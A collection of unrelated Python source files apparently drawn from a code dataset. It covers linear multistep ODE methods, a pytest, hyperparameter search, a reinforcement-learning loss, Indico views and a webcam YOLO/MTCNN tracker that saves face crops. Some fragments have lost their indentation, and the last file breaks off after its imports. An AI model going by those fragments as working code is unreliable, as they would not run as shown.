        Y = np.tile(y[:,np.newaxis],(1,N))
        x = np.linspace(bounds[0],bounds[1],N)
        X = np.tile(x,(N,1))
        R = vmag(X,Y)
        h = plt.figure(fignum)
        # Stable where R <= 1; contour at level 1 is the stability boundary.
        if filled:
            plt.contourf(X,Y,R,[0,1],colors=color,alpha=alpha)
        else:
            plt.contour(X,Y,R,[0,1],colors=color,alpha=alpha)
        plt.contour(X,Y,R,np.linspace(0,1,10),colors='k')
        plt.title('IMEX Stability Region for '+self.name)
        plt.plot([0,0],[bounds[2],bounds[3]],'--k',linewidth=2)
        plt.plot([bounds[0],bounds[1]],[0,0],'--k',linewidth=2)
        plt.axis(bounds)
        return h
    def stiff_damping_factor(self,epsilon=1.e-7):
        r"""
        Return the magnitude of the largest root at z=-inf.
        This routine just computes a numerical approximation
        to the true value (with absolute accuracy epsilon).
        """
        rho, sigma1 = self.method1.__num__().characteristic_polynomials()
        rho, sigma2 = self.method2.__num__().characteristic_polynomials()
        mag = lambda a, b: _max_root(rho - a*sigma1 - 1j*b*sigma2)
        # March z toward -infinity (multiplying by 10) until the root
        # magnitude converges to within epsilon.
        f=[]
        z=-1.
        f.append(mag(z,0))
        while True:
            z = z*10.
            f.append(mag(z,0))
            if np.abs(f[-1]-f[-2]) < epsilon:
                return f[-1]
            if len(f)>100:
                # Dump the iterates to aid debugging before giving up.
                print(f)
                raise Exception('Unable to compute stiff damping factor: slow convergence')
# ======================================================
def _max_root(p):
return max(np.abs(p.r))
def _root_condition(p,tol=1.e-13):
r""" True if the polynomial `p` has all roots inside
the unit circle and roots on the boundary of the unit circle
are simple.
**Examples**::
>>> from nodepy import lm
>>> p = np.poly1d((1,0.4,2,0.5))
>>> lm._root_condition(p)
False
"""
if max(np.abs(p.r))>(1+tol):
return False
mod_one_roots = [r for r in p.r if abs(abs(r)-1)<tol]
for i,r1 in enumerate(mod_one_roots):
for r2 in mod_one_roots[i+1:]:
if abs(r1-r2)<tol:
return False
return True
# ======================================================
# Families of multistep methods
# ======================================================
def Adams_Bashforth(k):
    r"""
    Construct the k-step, Adams-Bashforth method.
    The methods are explicit and have order k.
    They have the form:
    `y_{n+1} = y_n + h \sum_{j=0}^{k-1} \beta_j f(y_n-k+j+1)`
    They are generated using equations (1.5) and (1.7) from
    [hairer1993]_ III.1, along with the binomial expansion.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> ab3=lm.Adams_Bashforth(3)
        >>> ab3.order()
        3
    References:
        #. [hairer1993]_
    """
    import sympy
    from sympy import Rational
    one = Rational(1,1)
    alpha=snp.zeros(k+1)
    beta=snp.zeros(k+1)
    alpha[k]=one
    alpha[k-1]=-one
    gamma=snp.zeros(k)
    gamma[0]=one
    beta[k-1]=one
    betaj=snp.zeros(k+1)
    for j in range(1,k):
        gamma[j]=one-sum(gamma[:j]/snp.arange(j+1,1,-1))
        for i in range(0,j+1):
            # sympy.binomial is the supported public API; the old
            # sympy.combinatorial.factorials.binomial path is not available
            # in modern SymPy releases.
            betaj[k-i-1]=(-one)**i*sympy.binomial(j,i)*gamma[j]
        beta=beta+betaj
    name=str(k)+'-step Adams-Bashforth'
    return LinearMultistepMethod(alpha,beta,name=name,shortname='AB'+str(k))
def Nystrom(k):
    r"""
    Construct the k-step explicit Nystrom linear multistep method.
    The methods are explicit and have order k.
    They have the form:
    `y_{n+1} = y_{n-1} + h \sum_{j=0}^{k-1} \beta_j f(y_n-k+j+1)`
    They are generated using equations (1.13) and (1.7) from
    [hairer1993]_ III.1, along with the binomial expansion
    and the relation in exercise 4 on p. 367.
    Note that the term "Nystrom method" is also commonly used to refer
    to a class of methods for second-order ODEs; those are NOT
    the methods generated by this function.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> nys3=lm.Nystrom(6)
        >>> nys3.order()
        6
    References:
        #. [hairer1993]_
    """
    import sympy
    from sympy import Rational
    one = Rational(1,1)
    alpha = snp.zeros(k+1)
    alpha[k] = one
    alpha[k-2] = -one
    beta = snp.zeros(k+1)
    kappa = snp.zeros(k)
    gamma = snp.zeros(k)
    gamma[0] = one
    kappa[0] = 2*one
    beta[k-1] = 2*one
    betaj = snp.zeros(k+1)
    for j in range(1,k):
        gamma[j] = one-sum(gamma[:j]/snp.arange(j+1,1,-1))
        kappa[j] = 2 * gamma[j] - gamma[j-1]
        for i in range(0,j+1):
            # sympy.binomial replaces the removed
            # sympy.combinatorial.factorials.binomial path.
            betaj[k-i-1] = (-one)**i*sympy.binomial(j,i)*kappa[j]
        beta = beta+betaj
    name = str(k)+'-step Nystrom'
    return LinearMultistepMethod(alpha,beta,name=name,shortname='Nys'+str(k))
def Adams_Moulton(k):
    r"""
    Construct the k-step, Adams-Moulton method.
    The methods are implicit and have order k+1.
    They have the form:
    `y_{n+1} = y_n + h \sum_{j=0}^{k} \beta_j f(y_n-k+j+1)`
    They are generated using equation (1.9) and the equation in
    Exercise 3 from Hairer & Wanner III.1, along with the binomial
    expansion.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> am3=lm.Adams_Moulton(3)
        >>> am3.order()
        4
    References:
        [hairer1993]_
    """
    import sympy
    alpha=snp.zeros(k+1)
    beta=snp.zeros(k+1)
    alpha[k]=1
    alpha[k-1]=-1
    gamma=snp.zeros(k+1)
    gamma[0]=1
    beta[k]=1
    betaj=snp.zeros(k+1)
    for j in range(1,k+1):
        gamma[j]= -sum(gamma[:j]/snp.arange(j+1,1,-1))
        for i in range(0,j+1):
            # sympy.binomial replaces the removed
            # sympy.combinatorial.factorials.binomial path.
            betaj[k-i]=(-1)**i*sympy.binomial(j,i)*gamma[j]
        beta=beta+betaj
    name=str(k)+'-step Adams-Moulton'
    return LinearMultistepMethod(alpha,beta,name=name,shortname='AM'+str(k))
def Milne_Simpson(k):
    r"""
    Construct the k-step, Milne-Simpson method.
    The methods are implicit and (for k>=3) have order k+1.
    They have the form:
    `y_{n+1} = y_{n-1} + h \sum_{j=0}^{k} \beta_j f(y_n-k+j+1)`
    They are generated using equation (1.15), the equation in
    Exercise 3, and the relation in exercise 4, all from Hairer & Wanner
    III.1, along with the binomial expansion.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> ms3=lm.Milne_Simpson(3)
        >>> ms3.order()
        4
    References:
        [hairer1993]_
    """
    import sympy
    alpha = snp.zeros(k+1)
    beta = snp.zeros(k+1)
    alpha[k] = 1
    alpha[k-2] = -1
    gamma = snp.zeros(k+1)
    kappa = snp.zeros(k+1)
    gamma[0] = 1
    kappa[0] = 2
    beta[k] = 2
    betaj = snp.zeros(k+1)
    for j in range(1,k+1):
        gamma[j] = -sum(gamma[:j]/snp.arange(j+1,1,-1))
        kappa[j] = 2 * gamma[j] - gamma[j-1]
        for i in range(0,j+1):
            # sympy.binomial replaces the removed
            # sympy.combinatorial.factorials.binomial path.
            betaj[k-i] = (-1)**i*sympy.binomial(j,i)*kappa[j]
        beta = beta+betaj
    name = str(k)+'-step Milne-Simpson'
    return LinearMultistepMethod(alpha,beta,name=name,shortname='MS'+str(k))
def backward_difference_formula(k):
    r"""
    Construct the k-step backward differentiation method.
    The methods are implicit and have order k.
    They have the form:
    `\sum_{j=0}^{k} \alpha_j y_{n+k-j+1} = h \beta_j f(y_{n+1})`
    They are generated using equation (1.22') from Hairer & Wanner III.1,
    along with the binomial expansion.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> bdf4=lm.backward_difference_formula(4)
        >>> bdf4.A_alpha_stability()
        73
    **References**:
        #. [hairer1993]_ pp. 364-365
    """
    import sympy
    alpha=snp.zeros(k+1)
    beta=snp.zeros(k+1)
    beta[k]=1
    gamma=snp.zeros(k+1)
    gamma[0]=1
    alphaj=snp.zeros(k+1)
    for j in range(1,k+1):
        gamma[j]= sympy.Rational(1,j)
        for i in range(0,j+1):
            # sympy.binomial replaces the removed
            # sympy.combinatorial.factorials.binomial path.
            alphaj[k-i]=(-1)**i*sympy.binomial(j,i)*gamma[j]
        alpha=alpha+alphaj
    name=str(k)+'-step BDF'
    return LinearMultistepMethod(alpha,beta,name=name,shortname='BDF'+str(k))
def elm_ssp2(k):
    r"""
    Returns the optimal SSP k-step linear multistep method of order 2.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> lm10=lm.elm_ssp2(10)
        >>> lm10.ssp_coefficient()
        8/9
    """
    import sympy
    # Only three alpha entries and one beta entry are nonzero.
    km1_sq = (k - 1)**2
    alpha = snp.zeros(k + 1)
    beta = snp.zeros(k + 1)
    alpha[k] = sympy.Rational(1, 1)
    alpha[0] = sympy.Rational(-1, km1_sq)
    alpha[k - 1] = sympy.Rational(1 - km1_sq, km1_sq)
    beta[k - 1] = sympy.Rational(k, k - 1)
    return LinearMultistepMethod(alpha, beta,
                                 name='Optimal %d-step, 2nd order SSP method.' % k)
def sand_cc(s):
    r""" Construct Sand's circle-contractive method of order `p=2(s+1)`
    that uses `2^s + 1` steps.
    **Examples**::
        >>> import nodepy.linear_multistep_method as lm
        >>> cc4 = lm.sand_cc(4)
        >>> cc4.order()
        10
        >>> cc4.ssp_coefficient()
        1/8
    **References**:
        #. [sand1986]_
    """
    import sympy
    one = sympy.Rational(1)
    k = 2**s + 1
    # Step indices used by the method: k, k-1, and k-1-2^i for i=1..s.
    Jn = [k,k-1]
    for i in range(1,s+1):
        Jn.append(k-1-2**i)
    alpha = snp.zeros(k+1)
    beta = snp.zeros(k+1)
    for j in Jn:
        # Removed dead pre-assignments of tau_product/tau_sum (they were
        # immediately overwritten) and the unused `zero` constant.
        tau = [one/(j-i) for i in Jn if i!=j]
        tau_product = np.prod(tau)
        tau_sum = np.sum(tau)
        beta[j] = tau_product**2
        alpha[j] = 2*beta[j]*tau_sum
    return LinearMultistepMethod(alpha,beta,'Sand circle-contractive')
def arw2(gam,c):
    r"""Returns the second order IMEX additive multistep method based on the
    parametrization in Section 3.2 of Ascher, Ruuth, & Whetton.  The parameters
    are gam and c.  Known methods are obtained with the following values:
        (1/2,0):   CNAB
        (1/2,1/8): MCNAB
        (0,1):     CNLF
        (1,0):     SBDF
    **Examples**::
        >>> from nodepy import lm
        >>> import sympy
        >>> CNLF = lm.arw2(0,sympy.Rational(1))
        >>> CNLF.order()
        2
        >>> CNLF.method1.ssp_coefficient()
        1
        >>> CNLF.method2.ssp_coefficient()
        0
        >>> print(CNLF.stiff_damping_factor()) #doctest: +ELLIPSIS
        0.999...
    """
    one_half = sympy.Rational(1,2)
    name = 'ARW2('+str(gam)+','+str(c)+')'
    # Implicit (beta) and explicit (gamma) parts of the additive method.
    implicit_part = snp.array([c/2, 1-gam-c, gam+c/2])
    explicit_part = snp.array([-gam, gam+1, 0])
    step_coeffs = snp.array([gam-one_half, -2*gam, gam+one_half])
    return AdditiveLinearMultistepMethod(step_coeffs, implicit_part, explicit_part, name)
def arw3(gam,theta,c):
    r"""Returns the third order IMEX additive multistep method based on the
    parametrization in Section 3.3 of Ascher, Ruuth, & Whetton. The parameters
    are gamma, theta, and c.  Known methods are obtained with the following values:
        (1,0,0): SBDF3
    Note that there is one sign error in the ARW paper; it is corrected here.
    """
    half = sympy.Rational(1,2)
    third = sympy.Rational(1,3)
    # alpha: step coefficients; beta: implicit (f) part; gamma: explicit (g)
    # part. These polynomial-in-gam formulas are transcribed from ARW sec. 3.3
    # and are order-sensitive — do not rearrange terms.
    alpha = snp.array([-half*gam**2+third/2, 3*half*gam**2+gam-1, -3*half*gam**2-2*gam+half-theta,
                       half*gam**2+gam+third+theta])
    beta = snp.array([5*half/6*theta-c, (gam**2-gam)*half+3*c-4*theta*third, 1-gam**2-3*c+23*theta*third/4,
                      (gam**2+gam)*half+c])
    gamma = snp.array([(gam**2+gam)*half+5*theta*third/4, -gam**2-2*gam-4*theta*third,
                       (gam**2+3*gam)*half+1+23*theta*third/4,0])
    return AdditiveLinearMultistepMethod(alpha,beta,gamma,'ARW3('+str(gam)+','+str(theta)+','+str(c)+')')
def loadLMM(which='All'):
    """
    Load a set of standard linear multistep methods for testing.
    **Examples**::
        >>> from nodepy import lm
        >>> ebdf5 = lm.loadLMM('eBDF5')
        >>> ebdf5.is_zero_stable()
        True
    """
    # Explicit BDF5 (normalized by 137).
    scale = sympy.Rational(137, 1)
    ebdf5 = LinearMultistepMethod(
        snp.array([-12, 75, -200, 300, -300, 137]) / scale,
        snp.array([60, -300, 600, -600, 300, 0]) / scale,
        'eBDF 5')
    # Theta-method split additively between implicit and explicit parts.
    theta = sympy.Rational(1, 2)
    et112 = AdditiveLinearMultistepMethod(
        snp.array([-1, 1]),
        snp.array([1 - theta, theta]),
        snp.array([1, 0]),
        'Euler-Theta')
    LM = {'eBDF5': ebdf5, 'ET112': et112}
    if which == 'All':
        return LM
    return LM[which]
if __name__ == "__main__":
import doctest
doctest.testmod()
| StarcoderdataPython |
8097961 | from chembee.graphics import polar_plot
from chembee.processing import load_data
import os
import sys
import pytest
from pathlib import Path
@pytest.fixture(scope="module")
def script_loc(request):
    """Return the directory of the currently running test script as a Path."""
    # request.fspath is the test file; .parent gives its containing directory.
    return Path(request.fspath).parent
def test_polar_plot(script_loc):
    """Smoke test: load the bundled Biodeg dataset and render a polar plot
    into the plots/ directory next to this test."""
    dataset = load_data(script_loc / "data" / "Biodeg.sdf")
    polar_plot(dataset, save_path=script_loc / "plots")
| StarcoderdataPython |
355794 | <filename>SourceCode/ModelSystem/Models/hyperopt.py
from sklearn.model_selection import cross_val_score
from hyperopt import hp,STATUS_OK,Trials,fmin,tpe
from sklearn.ensemble import RandomForestClassifier
import pickle
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.metrics import cohen_kappa_score
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVC
from sklearn.linear_model import Ridge
from kappa import quadratic_weighted_kappa
# Load the pickled feature matrix and labels produced upstream.
x_train_path = "./X_train.pickle"
with open(x_train_path,"rb") as f:
    x_train = pickle.load(f)
y_train_path = "./Y_train.pickle"
with open(y_train_path,"rb") as f:
    y_train = pickle.load(f)
# Label histogram / cumulative distribution.
# NOTE(review): hist and cdf appear unused in the rest of this script.
hist = np.bincount(y_train)
cdf = np.cumsum(hist) / float(sum(hist))
'''
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(\
    x_train,y_train,test_size = 0.3,random_state = 0)
'''
# Manual train/test split: first sz samples train, the rest test.
sz = 7000
x_test = x_train[sz:]
y_test = y_train[sz:]
x_train = x_train[:sz]
y_train = y_train[:sz]
# Compute per-sample weights from the relevance variance column.
def getWeights():
    """Return sample weights for the first `sz` training rows.

    Samples with higher `relevance_variance` get lower weight:
    weight = 1 / (variance + 1).
    """
    import pandas as pd
    dfTrain = pd.read_csv('./ModelSystem/RawData/train.csv')
    # Vectorized equivalent of the original per-element loop.
    weights = 1.0 / (dfTrain["relevance_variance"].to_numpy(dtype=float) + 1.0)
    print("Get Weight Success")
    # Align with the manual train split (module-level sz).
    return weights[:sz]
def hyperopt_train_test(params):
    """Score one hyperparameter sample: mean cross-validation score of a
    Ridge model built with **params on the module-level training data."""
    # Model selection — previously tried estimators kept for reference:
    # clf = RandomForestClassifier(**params, n_jobs=8, max_features='auto', max_depth=None, criterion='gini')
    # clf = SVC(**params)
    # clf.fit(x_train,y_train,sample_weight=getWeights())
    # Y_predict=clf.predict(x_test)
    # clf=xgb(**params,n_jobs=8)
    # clf= LinearRegression(**params,n_jobs=-1)
    clf = Ridge(**params)
    return cross_val_score(clf, x_train, y_train).mean()
    # return quadratic_weighted_kappa(Y_predict,y_test)
best = 0
# Hyperopt search space for the currently selected model (Ridge).
# Parameter blocks for previously tried models are kept, commented out.
space = {
    # SVM parameters
    # 'C': hp.uniform('C', 0, 200),
    # 'kernel': hp.choice('kernel', ['linear', 'sigmoid', 'poly', 'rbf']),
    # 'gamma': hp.uniform('gamma', 0, 200),
    # Random-forest parameters
    # 'n_estimators': hp.choice('n_estimators', range(100,500)),
    # 'min_samples_leaf':hp.choice('min_samples_leaf',range(1,10)),
    # 'min_samples_split':hp.uniform('min_samples_split',0,0.99),
    # XGBoost parameters
    # 'learning_rate':hp.uniform('learning_rate',0.01,0.2),
    # 'max_depth':hp.choice('max_depth',range(3,10)),
    # 'n_estimator':hp.choice('n_estimator',range(100,1000)),
    # Linear-regression parameters (none)
    # Ridge parameters
    'alpha': hp.uniform('alpha', 0.001, 0.999),
    # hp.choice takes (label, options): the original passed 500 and 5000 as
    # two positional arguments, which raises a TypeError inside hyperopt.
    # Search the integer range instead, matching the commented examples above.
    # TODO(review): confirm the intended candidate set for max_iter.
    'max_iter': hp.choice('max_iter', range(500, 5000)),
    'solver': hp.choice('solver', ['auto','svd','cholesky','lsqr','sparse_cg','sag'])
}
def f(params):
    """Hyperopt objective: evaluate one sample, track the best score seen,
    and return the (negated) score as the loss to minimize."""
    global best
    score = hyperopt_train_test(params)
    if score > best:
        best = score
        print('new best:', best, params)
    return {'status': STATUS_OK, 'loss': -score}
trials = Trials()
# Run the TPE search; max_evals controls the optimization budget.
best = fmin(f, space, algo=tpe.suggest, max_evals=300, trials=trials)
print('best:', best)
# Persist the best hyperparameters; append mode keeps a history of runs.
# The context manager guarantees the file is closed even on error.
with open('SVR_best.txt', 'a+') as doc:
    print('best:', best, file=doc)
###################################
| StarcoderdataPython |
9798586 | <filename>egg/zoo/gym-game/models/compute_loss.py
import argparse
import numpy as np
import torch
import random
import comm_game_config as configs
from modules.model import AgentModule
from modules.random_model import RandomAgentModule
from modules.comm_game import GameModule
from collections import defaultdict
import json
import pdb
from tqdm import tqdm
# Indices of the two agents along dim 1 of the rewards/log-probs tensors.
STUDENT = 1
TEACHER = 0
def discounted_cumsum_right(single_round, gamma):
    """Right-to-left discounted cumulative sum along the time axis (dim 1).

    out[:, t] = sum_{u >= t} gamma**(u - t) * single_round[:, u]

    :param single_round: 2-D tensor (rows, timesteps)
    :param gamma: discount factor
    :return: tensor of the same shape as single_round
    """
    out = torch.zeros_like(single_round)
    running = torch.zeros(single_round.shape[0])
    for t in range(single_round.shape[1] - 1, -1, -1):
        running = single_round[:, t] + gamma * running
        out[:, t] = running
    return out
def discount_rewards(rewards, teach_iters, test_iters, gamma):
    """Return discounted future rewards, computed independently per round.

    The time axis (dim 2) is split into an optional teaching segment of
    length `teach_iters` followed by three test segments of length
    `test_iters`; the discounted right-cumsum is applied within each
    segment, per batch element.

    :param rewards: tensor (batch, agents, timesteps)
    :param gamma: discount factor
    :return: tensor of the same shape as rewards
    """
    returns = torch.zeros_like(rewards)
    # Collect (start, end) boundaries of every round on the time axis.
    segments = []
    if teach_iters > 0:
        segments.append((0, teach_iters))
    for round_idx in range(3):
        start = teach_iters + round_idx * test_iters
        segments.append((start, start + test_iters))
    # Discount each segment separately, one batch element at a time.
    for start, end in segments:
        for batch_idx, batch_slice in enumerate(rewards[:, :, start:end]):
            returns[batch_idx, :, start:end] = discounted_cumsum_right(batch_slice, gamma)
    return returns
def get_loss(game, subtract_baseline=True, entropy_term=True, entropy_beta=0.1, discount_factor=1):
    """
    Returns sum of total future loss at each time step (REINFORCE-style).

    :param game: game module exposing ``max_teach_iters``, ``max_test_iters``
        and per-step ``memories`` dict with 'rewards', 'log_probs', 'entropy'
    :param subtract_baseline: (bool) if True, mean-centres the discounted returns
    :param entropy_term: (bool) if True, subtracts entropy_beta * avg. action
        distribution entropy over the round (exploration bonus).
    :param entropy_beta: weight of the entropy bonus
    :param discount_factor: (0 < float <= 1)
    :return: (total_loss, total_teacher_loss, total_student_loss, total reward,
              teacher reward, student reward, avg teacher entropy, avg student entropy)
    """
    max_teach_iters = game.max_teach_iters
    max_test_iters = game.max_test_iters
    # Process rewards: per-agent totals (summed over batch and time)
    rewards = game.memories['rewards']
    total_rewards = torch.sum(rewards, dim=[0, 2])
    discounted_future_returns = discount_rewards(rewards, max_teach_iters, max_test_iters, discount_factor)
    if subtract_baseline:
        # calculate mean over all batches
        # NOTE(review): `std` is computed but never used below -- the returns are
        # only mean-centred, not divided by (stdev + eps)
        mean, std = torch.mean(discounted_future_returns, dim=[0,2]), torch.std(discounted_future_returns, dim=2)
        discounted_future_returns = torch.sub(discounted_future_returns, mean.unsqueeze(0).unsqueeze(2))
    # Process log probs, loss: policy-gradient term -log_prob * return
    log_probs = game.memories['log_probs']
    student_log_probs = log_probs[:, STUDENT]
    total_student_loss = torch.sum(torch.mul(-1 * student_log_probs, discounted_future_returns[:,STUDENT]), [0,1])
    total_teacher_loss = torch.tensor(0.0)
    avg_student_entropy = torch.mean(game.memories['entropy'][:, STUDENT])
    avg_teacher_entropy = torch.mean(game.memories['entropy'][:, TEACHER])
    if entropy_term:
        # higher entropy lowers the loss, encouraging exploration
        total_student_loss -= avg_student_entropy * entropy_beta
    # the teacher only acts (and is only trained) when there is a teaching phase
    if max_teach_iters > 0:
        teacher_log_probs = log_probs[:, TEACHER]
        total_teacher_loss = torch.sum(torch.mul(-1 * teacher_log_probs, discounted_future_returns[:,TEACHER]), [0,1])
        if entropy_term:
            total_teacher_loss -= torch.mean(game.memories['entropy'][:, TEACHER]) * entropy_beta
    total_loss = total_teacher_loss + total_student_loss
    return total_loss, total_teacher_loss, total_student_loss, torch.sum(total_rewards), \
           total_rewards[TEACHER], total_rewards[STUDENT], avg_teacher_entropy, avg_student_entropy
| StarcoderdataPython |
6506549 | from .torch_model import TorchModel
from .training import Train | StarcoderdataPython |
8063495 | # This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.modules.events.management.views import WPEventManagement
from indico.modules.events.views import WPConferenceDisplayBase
from indico.util.i18n import _
from indico.web.breadcrumbs import render_breadcrumbs
from indico.web.views import WPDecorated, WPJinjaMixin
class WPVCManageEvent(WPEventManagement):
    """Event-management page for configuring videoconference rooms."""
    sidemenu_option = 'videoconference'
    template_prefix = 'vc/'
    bundles = ('module_vc.js', 'module_vc.css')
class WPVCEventPage(WPConferenceDisplayBase):
    """Conference display page listing an event's videoconference rooms."""
    menu_entry_name = 'videoconference_rooms'
    template_prefix = 'vc/'
    bundles = ('module_vc.js', 'module_vc.css')
class WPVCService(WPJinjaMixin, WPDecorated):
    """Standalone videoconference service page (outside any event)."""
    template_prefix = 'vc/'
    def _get_breadcrumbs(self):
        # single translatable breadcrumb for the videoconference area
        return render_breadcrumbs(_('Videoconference'))
    def _get_body(self, params):
        return self._get_page_content(params)
12830676 | <filename>OLD THINGS/prac.py
#!/usr/bin/python
#
# Copyright 2018 BIG VISION LLC ALL RIGHTS RESERVED
#
from __future__ import print_function
import sys
import cv2
from random import randint
import argparse
import numpy as np
import cv2 as cv
from yolo_utils import infer_image
#Amir
from mtcnn.mtcnn import MTCNN
from skimage.measure import compare_ssim
from skimage.transform import resize
import glob
from FaceID import FaceID
#import face_recognition
trackerTypes = ['BOOSTING', 'MIL', 'KCF','TLD', 'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT']
def createTrackerByName(trackerType):
    """Create an OpenCV tracker instance from its name.

    Uses a dispatch table instead of the previous if/elif chain that was
    fragilely coupled to the order of ``trackerTypes``.  The cv2 factory
    attribute is resolved lazily via getattr so that OpenCV builds missing
    a particular tracker only fail when that tracker is requested.

    :param trackerType: one of 'BOOSTING', 'MIL', 'KCF', 'TLD',
        'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT'
    :return: a new tracker object, or None (after printing the valid
        names) when the name is not recognised
    """
    factories = {
        'BOOSTING': 'TrackerBoosting_create',
        'MIL': 'TrackerMIL_create',
        'KCF': 'TrackerKCF_create',
        'TLD': 'TrackerTLD_create',
        'MEDIANFLOW': 'TrackerMedianFlow_create',
        'GOTURN': 'TrackerGOTURN_create',
        'MOSSE': 'TrackerMOSSE_create',
        'CSRT': 'TrackerCSRT_create',
    }
    factory_name = factories.get(trackerType)
    if factory_name is None:
        print('Incorrect tracker name')
        print('Available trackers are:')
        # same names, same order as the original trackerTypes list
        for t in factories:
            print(t)
        return None
    return getattr(cv2, factory_name)()
def yolo():
    """Run one YOLOv3 detection pass on the global `frame`, crop detected
    persons (and their faces via MTCNN) into ./dataset, and return a
    MultiTracker primed with every detected bounding box.

    Relies on module-level globals: `frame` (current video frame),
    `trackerType` (tracker name) and `boxes` (overwritten here).

    :return: (multiTracker, colors_multi) -- the initialized
             cv2.MultiTracker and one random BGR color per tracked box.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-m', '--model-path',
        type=str,
        default='./yolov3-coco/',
        help='The directory where the model weights and \
            configuration files are.')
    parser.add_argument('-w', '--weights',
        type=str,
        default='./yolov3-coco/yolov3.weights',
        help='Path to the file which contains the weights \
                for YOLOv3.')
    parser.add_argument('-cfg', '--config',
        type=str,
        default='./yolov3-coco/yolov3.cfg',
        help='Path to the configuration file for the YOLOv3 model.')
    parser.add_argument('-vo', '--video-output-path',
        type=str,
        default='./output.avi',
        help='The path of the output video file')
    parser.add_argument('-l', '--labels',
        type=str,
        default='./yolov3-coco/coco-labels',
        help='Path to the file having the \
                    labels in a new-line seperated way.')
    parser.add_argument('-c', '--confidence',
        type=float,
        default=0.5,
        help='The model will reject boundaries which has a \
                probabiity less than the confidence value. \
                default: 0.5')
    parser.add_argument('-th', '--threshold',
        type=float,
        default=0.3,
        help='The threshold to use when applying the \
                Non-Max Suppresion')
    parser.add_argument('--download-model',
        type=bool,
        default=False,
        help='Set to True, if the model weights and configurations \
                are not present on your local machine.')
    parser.add_argument('-t', '--show-time',
        type=bool,
        default=False,
        help='Show the time taken to infer each image.')
    FLAGS, unparsed = parser.parse_known_args()
    #print(FLAGS)
    # Get the labels
    labels = open(FLAGS.labels).read().strip().split('\n')
    # Intializing colors to represent each label uniquely
    colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
    # Load the weights and configutation to form the pretrained YOLOv3 model
    net = cv.dnn.readNetFromDarknet(FLAGS.config, FLAGS.weights)
    # Get the output layer names of the model
    layer_names = net.getLayerNames()
    layer_names = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
    ################################
    # `frame` is the module-level frame captured in the __main__ loop
    height, width = frame.shape[:2]
    img, bboxes, _, classid, _ = infer_image(net, layer_names, height, width, frame, colors, labels, FLAGS)
    global boxes
    boxes = [] #It's a list now
    # keep only detections of COCO class 0 (person)
    j=0
    for i in classid:
        if i==0:
            print("persons bounding box is: ",bboxes[j])
            boxes.append(bboxes[j].copy())
            # NOTE(review): indexes with the class id `i` (always 0 here), not `j`
            print(boxes[i])
        j=j+1
    ############################temp ###########33
    #for index,value in enumerate(boxes):
    # crop each detected person, then try to crop a face inside it with MTCNN
    itr = 0
    for i in range(len(boxes)):
        itr = itr + 1
        name = 'dataset/' + str("person") + str(itr) + ".jpg"
        y = boxes[i][1]
        x = boxes[i][0]
        h = boxes[i][3]
        w = boxes[i][2]
        crop_img = img[y:y+h,x:x+w]
        cv.imwrite(name,crop_img)
        detector = MTCNN()
        print("I am a detector phewww !")
        print(detector.detect_faces(crop_img))
        face_cropped = detector.detect_faces(crop_img)
        print(face_cropped,"Debug")
        if(len(face_cropped)>0):
            boxes_face = (face_cropped[0]['box'])
            y1 = boxes_face[1]
            x1 = boxes_face[0]
            h1 = boxes_face[3]
            w1 = boxes_face[2]
            crop_img_2 = crop_img[y1:y1+h1, x1:x1+w1]
            name = 'dataset/' + str("face")+ str(itr) + '.jpg'
            cv.imwrite(name,crop_img_2)
            #crop_img_2 = cv2.resize(crop_img_2,(100,100),interpolation=cv2.INTER_AREA)
        rec = FaceID()
        # Matching Part
        images = []
        for img in glob.glob("dataset/face*.jpg"):
            n = cv2.imread(img)
            images.append(n)
        #for img in images:
        #    img = cv2.resize(img,(100,100),interpolation=cv2.INTER_AREA)
        #if(np.linalg.norm(img-crop_img_2)>=0.9):
        #    val = np.linalg.norm(img-crop_img_2)
        #print("<NAME>",val)
        # Matching Part End
    ##########################temp done#########33
    my_tuple = []
    for i in bboxes:
        my_tuple.append(tuple(i))
    #print(my_tuple)
    # Create MultiTracker object
    multiTracker = cv2.MultiTracker_create()
    # Initialize MultiTracker with one tracker (and random color) per detection
    colors_multi = []
    for bbox in my_tuple:
        multiTracker.add(createTrackerByName(trackerType), frame, bbox)
        colors_multi.append((randint(64, 255), randint(64, 255), randint(64, 255)))
    return multiTracker, colors_multi
if __name__ == '__main__':
    print("Default tracking algoritm is CSRT \n"
          "Available tracking algorithms are:\n")
    for t in trackerTypes:
        print(t)
    #trackerType = "CSRT"
    trackerType = "CSRT"
    # Set video to load
    # NOTE(review): videoPath is unused -- the capture below reads webcam 0
    videoPath = "webcam.mp4"
    # Create a video capture object to read videos
    cap = cv2.VideoCapture(0)
    # Read first frame
    success, frame = cap.read()
    # quit if unable to read the video file
    if not success:
        print('Failed to read video')
        sys.exit(1)
    ## Select boxes
    bboxes = []
    colors = []
    boxes=[]
    ################# copied code
    # run YOLO once on the first frame to seed the multi-tracker
    multiTracker, colors_multi = yolo()
    # Process video and track objects
    while cap.isOpened():
        success, frame = cap.read()
        if not success:
            break
        # get updated location of objects in subsequent frames
        success, boxes = multiTracker.update(frame)
        # draw tracked objects
        for i, newbox in enumerate(boxes):
            p1 = (int(newbox[0]), int(newbox[1]))
            p2 = (int(newbox[0] + newbox[2]), int(newbox[1] + newbox[3]))
            cv2.rectangle(frame, p1, p2, colors_multi[i], 2, 1)
        # show frame
        cv2.imshow('MultiTracker', frame)
        # quit on ESC button
        if cv2.waitKey(1) & 0xFF == 27: # Esc pressed
            break
        # 'y' (121) re-runs detection to re-seed the trackers
        if cv2.waitKey(1) & 0xFF == 121:
            multiTracker, colors_multi = yolo()
            print("key presses")
147804 | import paddle
from paddle.autograd import PyLayer
